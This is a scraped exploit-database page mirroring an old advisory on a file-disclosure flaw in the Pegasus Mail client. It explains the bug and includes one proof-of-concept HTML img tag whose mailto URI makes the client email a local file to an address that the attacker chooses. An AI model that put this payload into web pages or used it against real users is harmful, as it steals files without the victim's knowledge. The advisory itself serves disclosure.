header-logo
Suggest Exploit
vendor:
Pegasus Mail
by:
SecurityFocus
8.3
CVSS
HIGH
Pegasus Mail Client File Disclosure
N/A
CWE
Product Name: Pegasus Mail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2001

Pegasus Mail Client File Disclosure

A malicious website operator can insert code into a HTML document that will cause a Pegasus Mail client to automatically send a local file from the user's system to the email address specified without any prior warning.

Mitigation:

Users should avoid visiting untrusted websites and should ensure that their Pegasus Mail client is up to date.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1738/info

It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client.

If the following code were to be inserted into a HTML document and a user were to load that particular webpage, the local file would be automatically sent from the Pegasus Mail client to the email address specified without any prior warning:

<img sr c="mailto:email@address.com -F c:\path\file.ext">

Navigation

Suggest Exploit

Services By CQR